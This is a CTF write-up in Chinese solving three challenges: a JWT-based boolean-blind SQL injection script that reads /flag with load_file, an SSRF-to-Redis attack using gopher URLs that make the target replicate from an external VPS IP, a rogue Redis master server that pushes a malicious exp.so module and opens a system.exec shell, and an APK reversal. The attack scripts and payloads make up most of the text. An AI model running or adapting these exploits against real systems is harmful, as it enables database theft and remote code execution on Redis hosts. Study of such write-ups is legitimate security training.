查看JS,在JS中找到p14.php,直接copy下來在console執行,輸入戰隊的token就可以了

js_on
順手輸入一個 admin admin,看到下面的信息
歡迎admin
這里是你的信息:key:xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6
第一步想的是二次注入,但是一直被嘲諷,出題人素質有待加強。然后重新捋一遍思路:是不是命令注入?稍微測試了一下,感覺不對路。重新回過頭,提示的這個key很明顯是 JWT 的key,然后猜測二次注入的部分是不是在token部分。結果二次注入沒發現,倒是發現在 token處存在布爾注入:如果為真,news會返回你輸入的內容;如果為假,則返回 ???no message
腳本
# coding=utf-8
import jwt
import requests
import re
# Silence urllib3's InsecureRequestWarning for the requests made below.
requests.packages.urllib3.disable_warnings()
# HMAC secret taken from the "key:" message the site shows after login (see the
# page text).  Because the app signs its own JWT with it, any claim value can be
# minted.  Review note: a signature only proves who signed the token; the
# "user" claim is still untrusted input on the SQL side and must be
# parameterized, and the signing key must never be shown to users.
key = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"
url = "http://84f801d8da46417d9747f9bb2f8187b963c126676ca644fd.cloudgame1.ichunqiu.com/index.php"
# All traffic is routed through a local proxy on :8080 (presumably an
# intercepting proxy used while solving) — remove if none is listening.
proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
# info = jwt.decode("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuZXdzIjoia2V5OnhSdCpZTURxeUNDeFl4aTlhQExnY0dwbm1NMlg4aSY2In0.EpNdctJ5Knu4ZkRcatsyMOxas1QgomB0Z49qb7_eoVg",key,algorithms=['HS256'])
# if info:
# print(info)
# payloadTmpl = "i'/**/or/**/ascii(mid(database(),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(sc<a>hema_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.S<a>CHEMATA),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(ta<a>ble_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.t<a>ables/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(col<a>umn_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.c<a>olumns/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
# Boolean-blind template placed in the "user" claim.  The two {} are the
# 1-based character position and the ASCII threshold; the server's reply
# carries the "success" marker only when the comparison is true (checked in
# half_interval).  The /**/ and <a> fragments are the keyword-splitting the
# author used — the page does not say which filter required them.
payloadTmpl = "i'/**/or/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),{},1))>{}#"
def half_interval():
    """Recover a string one character at a time through the boolean oracle.

    For each of the first 44 positions (hard-coded ``range(1,45)``), binary-
    search the ASCII value in [32, 127] by asking whether the character is
    greater than ``mid``; the presence of "success" in the response body is
    the truth signal (per the page: true -> news echoes the input, false ->
    a "no message" text).  One HTTP request per probe; the accumulated
    string is printed after every character.

    Returns:
        None; output goes to stdout.
    """
    result = ""
    for i in range(1,45):
        # NOTE: `min`/`max` shadow the builtins; here they are the search
        # interval bounds (exclusive lower, inclusive upper).
        min = 32
        max = 127
        while abs(max-min) > 1:
            mid = (min + max)//2
            payload = payloadTmpl.format(i,mid)
            jwttoken = {
                "user": payload,
                "news": "success"
            }
            # .decode("ascii") assumes jwt.encode returns bytes, i.e. PyJWT < 2.0
            # — TODO confirm; PyJWT >= 2 returns str and this line raises.
            payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
            # print(payload)
            cookies = dict(token=str(payload))
            res = requests.get(url,cookies=cookies,proxies=proxies)
            # Oracle: "success" anywhere in the body means char > mid.
            if re.findall("success", res.text) != []:
                min = mid
            else:
                max = mid
        # The loop exits with max - min == 1, so the character equals `max`.
        result += chr(max)
        print(result)
# Script entry point: run the extraction loop (the commented block below was
# the author's single-request debugging harness).
if __name__ == "__main__":
    half_interval()
# payload = payloadTmpl.format(1,32)
# jwttoken = {
# "user": payload,
# "news": "success"
# }
# print(jwttoken)
# payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
# print(payload)
# cookies = dict(token=str(payload))
# res = requests.get(url,cookies=cookies,proxies=proxies)
# res.encoding='utf-8'
# print(res.text)
2.png

ssrfme
剛拿到題目,想起來跟 SECCON 的題目很像,直接DNS重綁定繞過第一步
獲取到hint的源碼,提示ssrf 打 redis,直接寫crontab,在save的時候提示沒權限;寫shell則不知道路徑
一直主從復制也沒成功
很坑,沒權限
后來檢查一下發現目錄不對,轉移到有權限的/tmp 下面
gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
然后重復主從的步驟,在自己的VPS上起好了 rogue 服務器
gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252039.107.68.253%252060001%250d%250aquit
服務器監聽
import socket
import time
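# Line terminator used by the RESP protocol.
CRLF="\r\n"
# File served by RogueServer as the bulk payload of the FULLRESYNC reply.
exp_filename="exp.so"
# Read it once at import time.  The context manager closes the handle (the
# original left it open); a missing file raises IOError / FileNotFoundError
# here, before any socket is opened.
with open(exp_filename, "rb") as _payload_file:
    payload = _payload_file.read()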
def redis_format(arr):
    """Encode a space-separated command string as a RESP multi-bulk message.

    ``arr`` is split on single spaces (consecutive spaces produce empty bulk
    strings, exactly as before); the result is ``*<count>`` followed by one
    ``$<len>CRLF<field>`` entry per field, CRLF-separated and CRLF-terminated.

    Args:
        arr: command line, e.g. ``"config set dir /tmp"``.

    Returns:
        The RESP-encoded string.
    """
    global CRLF
    fields = arr.split(" ")
    parts = ["*" + str(len(fields))]
    parts.extend("$" + str(len(field)) + CRLF + field for field in fields)
    return CRLF.join(parts) + CRLF
def redis_connect(rhost,rport):
    """Open a TCP connection to ``rhost:rport`` and return the socket.

    The caller owns the returned socket and is responsible for closing it.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((rhost, rport))
    return conn
def send(sock,cmd):
    """RESP-encode ``cmd`` via redis_format, send it, and print the reply.

    Only the first chunk (up to 1024 bytes) of the reply is read and shown,
    decoded as UTF-8.
    """
    encoded = redis_format(cmd)
    sock.send(encoded)
    reply = sock.recv(1024)
    print(reply.decode("utf-8"))
def interact_shell(sock):
    """Prompt on stdin and forward each line as ``system.exec <line>`` via send().

    Ends on "exit"/"quit" or Ctrl-C.  Uses ``raw_input``, so this is Python 2
    only.  Spaces are rewritten to ``${IFS}`` *before* the exit check, so an
    input containing a space can never match "exit"/"quit".

    Args:
        sock: connected socket from redis_connect.
    """
    flag=True
    try:
        while flag:
            shell=raw_input("\033[1;32;40m[*]\033[0m ")
            shell=shell.replace(" ","${IFS}")
            if shell=="exit" or shell=="quit":
                flag=False
            else:
                send(sock,"system.exec {}".format(shell))
    except KeyboardInterrupt:
        return
def RogueServer(lport):
    """Act as a minimal fake Redis master on 0.0.0.0:``lport`` for one client.

    Serves exactly one accepted connection: answers PING with +PONG and
    REPLCONF with +OK, and on the first PSYNC/SYNC replies with a FULLRESYNC
    header followed by ``payload`` framed as one bulk string, then leaves the
    loop.  The gopher requests on the page point the target at this port with
    ``slaveof``.

    Review notes:
      - Neither ``clientSock`` nor the listening socket is closed.
      - ``"PING" in data`` on received bytes and ``send(str)`` only work on
        Python 2 (consistent with ``raw_input`` in interact_shell).
      - ``recv(1024)`` may split one command across chunks; the substring
        checks do not handle that — TODO confirm against the target.
      - If the client disconnects before SYNC, ``recv`` returns empty data
        forever and the loop spins.
      - Defensive side: this only works because the Redis instance accepts
        CONFIG SET and SLAVEOF from the SSRF sink; keeping Redis off that
        network path and restricting those commands (rename-command / ACLs)
        is the mitigation.

    Args:
        lport: TCP port to listen on.
    """
    global CRLF
    global payload
    flag=True
    result=""
    sock=socket.socket()
    sock.bind(("0.0.0.0",lport))
    sock.listen(10)
    # One client only; the sockets are never closed afterwards.
    clientSock, address = sock.accept()
    while flag:
        data = clientSock.recv(1024)
        if "PING" in data:
            result="+PONG"+CRLF
            clientSock.send(result)
            flag=True
        elif "REPLCONF" in data:
            result="+OK"+CRLF
            clientSock.send(result)
            flag=True
        elif "PSYNC" in data or "SYNC" in data:
            # "+FULLRESYNC <40-char id> <offset>" then "$<len>" CRLF <bytes> CRLF;
            # the loop ends after this reply.
            result = "+FULLRESYNC " + "a" * 40 + " 1" + CRLF
            result += "$" + str(len(payload)) + CRLF
            result = result.encode()
            result += payload
            result += CRLF
            clientSock.send(result)
            flag=False
if __name__=="__main__":
    # Listener parameters only; as shown on the page nothing is invoked here,
    # so running the file just reads exp.so and exits.
    lhost, lport = "xxx.xxx.xxx.xxx", 60001

java
用 jadx 對 java.apk 反匯編
主程序邏輯並不復雜,正常的輸入,以及將輸入進行計算后比對
先對用戶輸入進行 AES 加密,Key 為 aes_check_key!@#,然后進行兩次異或,最后 base64 編碼
與 VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3進行比較
所以 crack 過程也很簡單,逆回來就得到輸入。但是中間卡在了密鑰上:密鑰並不是直接給的那個,還對密鑰里的 'e' 和 'o' 進行了替換,最終密鑰為 aos_chock_koy!@#,逆回去得到flag
